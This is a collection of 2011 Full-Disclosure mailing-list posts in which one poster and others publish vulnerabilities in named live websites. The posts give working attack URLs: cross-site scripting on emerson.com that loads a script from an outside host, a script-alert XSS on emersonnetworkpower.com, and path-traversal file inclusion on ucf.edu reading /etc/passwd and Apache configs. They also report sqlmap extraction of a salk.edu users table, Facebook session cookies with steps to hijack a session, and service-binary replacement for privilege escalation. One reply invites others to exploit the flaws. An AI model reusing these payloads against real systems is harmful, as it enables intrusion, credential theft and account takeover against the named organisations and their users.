Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
I agree. I am only talking of the scenario where this service is pre-installed. On Monday, September 26, 2011, Thor (Hammer of God) wrote: > You'd have to be admin to install as a service, and the service would > obviously need to then be running as local system to be of benefit (beyond > what a normal user could do anyway) AND the installer would have to grant a > normal user rights to overwrite it. > > Certainly possible, but the developer would have to go out of their way > to screw that up. And if they did, it still wouldn't be because of the OS... > > T > > > On Sep 25, 2011, at 6:18 PM, "Travis Biehn" wrote: > > GloW: there's a lot of 3rd party software that installs itself as > windows services. > > -Travis > > On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD wrote: > > Haha , too good and too true thor ! > > > Maybe he can trick the user into installing on a FAT32 partition first, and > THEN get the to execute from a remote share! > > Rofl x10. > > Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. > > Anyhow it has been a pleasure, ending this BS i think once and for all, > lookup how winlogon works for one thing, then look at how windows creates > and maintains a service_table, and then at the dlls, wich are protected ofc, > you cannot touch msgina.dll,without ALOT of help from a rootkit or something > similar, in wich case, why would you need to ? > You could add an admin, hidden, and in simple batfile script (yes i do have > my own code but no it is not for kids..), this is 10seconds and hidden, so > when you have gotten that far, why would you bother to hijack a dll ? > > You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and > total axcs to all sockets, meaning, all pipe control and thats where half of > windows exchanges smb shares for one thing, you guys dont seem to know CRAP > about windows to start with, then have the gall to raise such a frigging > ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this > being useful, or, even just working, and i would look but, you wont, cannot, > and will never be able to, especially on newer systems of windows7-8. > As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, > and whatever patches they instilled, dont touch even service_table.. so, > they have not given it a high prio,and why shuld they. > > This is simply a case of a secteam gaining notoriety, to try and make this > a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont > believe in many things MS, I know windows system, and how to break it, > better than many people, and i can tell you now, this whole DLL hijack, is a > complete and utter waste of your times. > But... keep on going, maybe MS will send you another 'thankyou' email ;) > xd / <http://crazycoders.com>crazycoders.com / #haxnet@Ef > > > > > > On 26 September 2011 10:52, Thor (Hammer of God) wrote: > > Maybe he can trick the user into installing on a FAT32 partition first, > and THEN get the to execute from a remote share! > > On Sep 25, 2011, at 5:30 PM, "Travis Biehn" wrote: > > It might be a fun experiment to see what DLLs they're looking for :.) > > > -Travis > > On Sun, Sep 25, 2011 at 2:57 PM, wrote: > > To replace a service executable you usually need administrator access > anyway. > > > --Original Message-- > From: Madhur Ahuja > Sender: > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
I havn't sent this email without doing a Proof of concept. It actually works with *Google Update Service*. The restricted user can replace GoogleUpdate.exe to execute malicious code. This service is installed by any of Google component such as Picasa, Google Talk etc. http://www.google.com/support/installer/bin/answer.py?answer=98805 Madhur On Monday, September 26, 2011, GloW - XD wrote: > Haha , too good and too true thor ! > > Maybe he can trick the user into installing on a FAT32 partition first, and > THEN get the to execute from a remote share! > > Rofl x10. > > Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. > > Anyhow it has been a pleasure, ending this BS i think once and for all, > lookup how winlogon works for one thing, then look at how windows creates > and maintains a service_table, and then at the dlls, wich are protected ofc, > you cannot touch msgina.dll,without ALOT of help from a rootkit or something > similar, in wich case, why would you need to ? > You could add an admin, hidden, and in simple batfile script (yes i do have > my own code but no it is not for kids..), this is 10seconds and hidden, so > when you have gotten that far, why would you bother to hijack a dll ? > > You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and > total axcs to all sockets, meaning, all pipe control and thats where half of > windows exchanges smb shares for one thing, you guys dont seem to know CRAP > about windows to start with, then have the gall to raise such a frigging > ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this > being useful, or, even just working, and i would look but, you wont, cannot, > and will never be able to, especially on newer systems of windows7-8. > As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, > and whatever patches they instilled, dont touch even service_table.. so, > they have not given it a high prio,and why shuld they. > > This is simply a case of a secteam gaining notoriety, to try and make this > a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont > believe in many things MS, I know windows system, and how to break it, > better than many people, and i can tell you now, this whole DLL hijack, is a > complete and utter waste of your times. > But... keep on going, maybe MS will send you another 'thankyou' email ;) > xd / crazycoders.com / #haxnet@Ef > > > > > On 26 September 2011 10:52, Thor (Hammer of God) wrote: > > Maybe he can trick the user into installing on a FAT32 partition first, > and THEN get the to execute from a remote share! > > On Sep 25, 2011, at 5:30 PM, "Travis Biehn" wrote: > > It might be a fun experiment to see what DLLs they're looking for :.) > > > -Travis > > On Sun, Sep 25, 2011 at 2:57 PM, wrote: > > To replace a service executable you usually need administrator access > anyway. > > > --Original Message-- > From: Madhur Ahuja > Sender: full-disclosure-boun...@lists.grok.org.uk > To: security-bas...@securityfocus.com > To: full-disclosure@lists.grok.org.uk > Subject: [Full-disclosure] Privilege escalation on Windows using > BinaryPlanting > Sent: 25 Sep 2011 19:31 > > Imagine a situation where I have a Windows system with the restricted > user access and want to get the Administrator access. > > There are many services in Windows which run with SYSTEM account. > > If there exists even one such service whose executable is not > protected by Windows File Protection, isn't it possible to execute > malicious code (such as gaining Administrator access) simply by > replacing the service executable with malicious one and then > restarting the service. > > As a restricted user, what's stopping me to do this ? > > Is there any integrity check performed by services.msc or service > itself before executing with SYSTEM account ? > > Madhur > > ___ > Full-Disclosure - We believe in it. > Charter: <http://lists.grok.org.uk/full-disclosure-charter.html> > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - <http://secunia.com/>http://secunia.com/ > > Sent from my POS BlackBerry wireless device, which may wipe itself at > any moment > ___ > Full-Disclosure - We believe in it. > Charter: <http://lists.grok.org.uk/full-disclosure-charter.html> > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - <http://secunia.com/>http://secunia.com/ > > > > > -- &g
[Full-disclosure] Privilege escalation on Windows using Binary Planting
Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Privilege escalation on Windows using Binary Planting
Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
The URL is publically visible in address bar if you open the site on Chrome. Not sure how are you categorizing it as "no one knows the url" Try the "Email this Article" link on the page below: http://www.emerson.com/en-US/newsroom/news-releases/emerson-financial-news/Pages/Emerson-to-Sell-Heating-Products-Business.aspx Madhur On Monday, September 5, 2011, Mr. Hinky Dink wrote: > > That... ahem... particular company has had that particular page > (/MCS/email.apsx) in one form or another for a long time, since the late > 90s at least, when it was a cgi app. > > IIRC, at one time you could SPAM anyone through it, but they learned > their lesson and now you can only SPAM the company's employees. > Considering the business they're in (think "SCADA" related) this could > be a Bad Thing. The XSS is just the icing on the cake. > > I find it interesting that they "upgraded" it to SharePoint. > > It's an in-house app, one of several. I believe the security model used > to be "no one knows the URL". > > I'm guessing you're a contractor for that particular company because, > after all, no one knows the URL. > > On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote: > > One of the pages in Emerson site are rendering the query string > > parameter without any inspection. This makes it possible to inject > > malicious content as shown below: > > > > > > > > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg% > > 20src=' > http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E > > > > > > > > > > > > > > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=% > > 22http://madhur.github.com/files/js/site.js%22%20type=% > > 22text/javascript%22%3E > > > > > > -- > > Madhur > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS Vulnerability in www.emerson.com
One of the pages in Emerson site are rendering the query string parameter without any inspection. This makes it possible to inject malicious content as shown below: http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E -- Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Context IS Advisory - MS11-066 .NET 4 - Microsoft Chart Control
Is there a POC or an exploit already for this vulnerability ? On Thu, Aug 11, 2011 at 9:38 PM, Context IS - Disclosure wrote: > ===ADVISORY=== > Systems Affected: .NET 4 - Microsoft Chart Control > Severity: High > Category: Information Disclosure > Author: Context Information Security Ltd > Reported to vendor: 3rd October 2010 > Advisory Issued: 11th August 2011 > Reference: MS11-066, CVE-2011-1977 > ===ADVISORY=== > > Description > --- > The Microsoft Chart Control is vulnerable to an information disclosure > vulnerability. By sending a specific GET request to an application > implementing the chart control, attackers could read arbitrary files on the > system. > > Analysis > > The Microsoft Chart Control plots graphs and with the default configuration > stores those as image files in a directory on the system. The graph images > are retrieved using GET requests and a file path parameter. > > When the control retrieves a request, it verifies that the requested file > path lies within the allowed directory and if so reads and returns the file’s > contents. However, the verification process was found to be flawed, resulting > in the ability to traverse directories to load arbitrary files. > > The Microsoft Chart Control is included in the .NET Framework 4 or can be > downloaded separately for .NET 3.5 (http://code.msdn.microsoft.com/mschart). > > This vulnerability was found using the Context App Tool (CAT > http://cat.contextis.com). > > Technologies Affected > - > > Microsoft .Net Framework 4 > > > Vendor Response > --- > Microsoft advises users to patch the .Net Framework to the latest version. > See the following Microsoft security bulletin for more details: > http://www.microsoft.com/technet/security/Bulletin/MS11-066.mspx > > > Disclosure Timeline > --- > 3rd October 2010 – Vendor Notification > 4th October 2010 – First Vendor Response > 16th November 2010 – Vendor Confirms Vulnerability > 9th August 2011 – Vendor Patch Released > > > Credits > > Nico Leidecker and James Forshaw of Context Information Security Ltd > > > About Context Information Security > -- > > Context Information Security is an independent security consultancy > specialising in both technical security and information assurance services. > > The company was founded in 1998. Its client base has grown steadily over the > years, thanks in large part to personal recommendations from existing clients > who value us as business partners. We believe our success is based on the > value our clients place on our product-agnostic, holistic approach; the way > we work closely with them to develop a tailored service; and to the > independence, integrity and technical skills of our consultants. > > The company’s client base now includes some of the most prestigious blue chip > companies in the world, as well as government organisations. > > The best security experts need to bring a broad portfolio of skills to the > job, so Context has always sought to recruit staff with extensive business > experience as well as technical expertise. Our aim is to provide effective > and practical solutions, advice and support: when we report back to clients > we always communicate our findings and recommendations in plain terms at a > business level as well as in the form of an in-depth technical report. > > Web: www.contextis.com > Email: disclos...@contextis.com > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SQL Injection on http://www.salk.edu/events/index.php?id=150
Retreived data using Sqlmap: Public Database: salkpublicweb2 Tables: [5 tables] +--+ | category | | faculty | | page | | users| | video| +--+ The users table contains around 80 username and password entries which can be easily retrieved. Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Contact for reporting Facebook vulnerability
Guys, Can we close this discussion now, since the vulnerability in discussion I was talking about is Session Sidejacking and its something applicable to all sites not just facebook. Thanks, Madhur On Mon, Jun 13, 2011 at 10:21 AM, TAS wrote: > And you think you couldn't have got that before you even posted on the list! > > > - > TAS > http://twitter.com/p0wnsauc3 > > -Original Message- > From: Madhur Ahuja > Sender: full-disclosure-boun...@lists.grok.org.uk > Date: Sat, 11 Jun 2011 15:59:20 > To: adam > Cc: > Subject: Re: [Full-disclosure] Contact for reporting Facebook vulnerability > > I found the link to form through this forum. > > On Sat, Jun 11, 2011 at 3:52 PM, adam wrote: >> Absolutely loved that last reply, Andrew. >> Madhur, you found a form to report security issues to Facebook and instead >> came here, to ask where you should go to report vulnerabilities to Facebook? >> Does that make sense to you? >> >> On Sat, Jun 11, 2011 at 2:41 PM, Andrew D Kirch wrote: >>> >>> Nah, report it here, bleach the hat later. >>> >>> On 6/11/2011 3:12 PM, Madhur Ahuja wrote: >>> > Shouldn't I first report to Facebook at >>> > http://www.facebook.com/help/contact.php?show_form=white_hat >>> > ? >>> > >>> > On Sat, Jun 11, 2011 at 3:10 PM, Andrew D Kirch >>> > wrote: >>> >> On 6/11/2011 2:51 PM, Madhur Ahuja wrote: >>> >>> Does anyone know where I can report vulnerabilities in Facebook ? >>> >>> >>> >>> Thanks, >>> >>> Madhur >>> >>> >>> >>> ___ >>> >>> Full-Disclosure - We believe in it. >>> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> Right here, simply reply to this e-mail. >>> >> >>> >> Andrew >>> >> >>> >> ___ >>> >> Full-Disclosure - We believe in it. >>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> >> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Session Sidejacking in facebook
Recently, there was a vulnerability discovered in LinkedIn, which is described here http://www.wtfuzz.com/blogs/linkedin-ssl-cookie-vulnerability/ Basically, this allows someone in network to sniff a cookie value and apply it in his browses session to hijack the target's user session. This simple concept even works even in Facebook. I was able to hijack n number of user's session sitting in my university room in few minutes. For every POST request in facebook, similar cookie string is transmitted: Cookie: datr=09bXXXQ2oOgQuUK0yAzK_JU9; lu=wgj9pmpkAsdXXXTp5vthfh2w; locale=en_US; L=2; act=13078123502562F3; c_user=xx; sct=1123416461; xs=603Afe43db8a71239bd8d7b2a831xxx6241f; presence=EM307818375L26REp_5f123422481F22X3078XXX1367K1H0V0Z21G307818375PEuoFD769839560FDexpF1307818409174EflF_5b_5dEolF-1; e=n I was able to hijack the remote user's session by just placing the value of 2 cookies: c_user (which is obviously user id) and xs (seems like auth token) in my browser session. Step by step POC: http://madhur.github.com/blog/2011/06/12/facebooksessionhijacking.html Cookie: datr=09bXXXQ2oOgQuUK0yAzK_JU9; lu=wgj9pmpkAsdXXXTp5vthfh2w; locale=en_US; L=2; act=13078123502562F3; c_user=xx; sct=1123416461; xs=603Afe43db8a71239bd8d7b2a831xxx6241f; presence=EM307818375L26REp_5f123422481F22X3078XXX1367K1H0V0Z21G307818375PEuoFD769839560FDexpF1307818409174EflF_5b_5dEolF-1; e=n Is this how it works in all social sites ? If the answer is yes, I will be highly doubtful of using internet at any public place where sniffing or MITM attack is relatively simple to make. Are there any measures to prevent it ? Madhur http://madhur.github.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Contact for reporting Facebook vulnerability
I found the link to form through this forum. On Sat, Jun 11, 2011 at 3:52 PM, adam wrote: > Absolutely loved that last reply, Andrew. > Madhur, you found a form to report security issues to Facebook and instead > came here, to ask where you should go to report vulnerabilities to Facebook? > Does that make sense to you? > > On Sat, Jun 11, 2011 at 2:41 PM, Andrew D Kirch wrote: >> >> Nah, report it here, bleach the hat later. >> >> On 6/11/2011 3:12 PM, Madhur Ahuja wrote: >> > Shouldn't I first report to Facebook at >> > http://www.facebook.com/help/contact.php?show_form=white_hat >> > ? >> > >> > On Sat, Jun 11, 2011 at 3:10 PM, Andrew D Kirch >> > wrote: >> >> On 6/11/2011 2:51 PM, Madhur Ahuja wrote: >> >>> Does anyone know where I can report vulnerabilities in Facebook ? >> >>> >> >>> Thanks, >> >>> Madhur >> >>> >> >>> ___ >> >>> Full-Disclosure - We believe in it. >> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> Right here, simply reply to this e-mail. >> >> >> >> Andrew >> >> >> >> ___ >> >> Full-Disclosure - We believe in it. >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Contact for reporting Facebook vulnerability
Shouldn't I first report to Facebook at http://www.facebook.com/help/contact.php?show_form=white_hat ? On Sat, Jun 11, 2011 at 3:10 PM, Andrew D Kirch wrote: > On 6/11/2011 2:51 PM, Madhur Ahuja wrote: >> Does anyone know where I can report vulnerabilities in Facebook ? >> >> Thanks, >> Madhur >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > Right here, simply reply to this e-mail. > > Andrew > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Contact for reporting Facebook vulnerability
Does anyone know where I can report vulnerabilities in Facebook ? Thanks, Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] University of Central Florida Multiple LFI
/etc/passwd is common location for passwd file. I didn't use any techneek On Sat, Feb 19, 2011 at 9:40 PM, Benji wrote: > Also Madhur how did you manage to find the /etc/passwd file? Whats ur > techneek? > > Thx > > Benji > IRC AND SILC USER - CEH > > On Sat, Feb 19, 2011 at 4:05 PM, Benji wrote: > >> rabble rabble rablle check out my pjear leet php auditing skills while >> advertising website rah rah rah >> >> Benji >> Administrator - http://mostof.ac.uk >> >> >> On Sat, Feb 19, 2011 at 4:03 PM, Hack Talk wrote: >> >>> Yea I was poking around the passwd file too. Looks like excel.ucf is >>> running Debian while chemistry.cos.ucf is running CentOS. >>> >>> >>> Luis Santana - Security+ >>> Administrator - http://hacktalk.net >>> HackTalk Security - Security From The Underground >>> >>> >>> >>> On Sat, Feb 19, 2011 at 6:04 AM, Madhur Ahuja wrote: >>> >>>> >>>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 >>>> >>>> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk wrote: >>>> >>>>> Found these and thought I'd share: >>>>> >>>>> -==- >>>>> >>>>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00 >>>>> >>>>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 >>>>> -==- >>>>> Let me know if you do anything fun with 'em >>>>> >>>>> Luis Santana - Security+ >>>>> Administrator - http://hacktalk.net >>>>> HackTalk Security - Security From The Underground >>>>> >>>>> >>>>> ___ >>>>> Full-Disclosure - We believe in it. >>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>>> Hosted and sponsored by Secunia - http://secunia.com/ >>>>> >>>> >>>> >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] University of Central Florida Multiple LFI
http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk wrote: > Found these and thought I'd share: > > -==- > > http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00 > > http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 > -==- > Let me know if you do anything fun with 'em > > Luis Santana - Security+ > Administrator - http://hacktalk.net > HackTalk Security - Security From The Underground > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Input not sanitized in Emerson network power
Found this search box last month which is not sanitizing any input : http://www.emersonnetworkpower.com/en-US/SearchCenter/Pages/AllResults.aspx?k=%3Cscript%3Ealert(document.cookie)%3C/script%3E&s=Network%20Power%20Content_en-US_en-US Have contacted the owner but there isn't any response. May be the vulnerability isn't serious enough to exploit -- Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
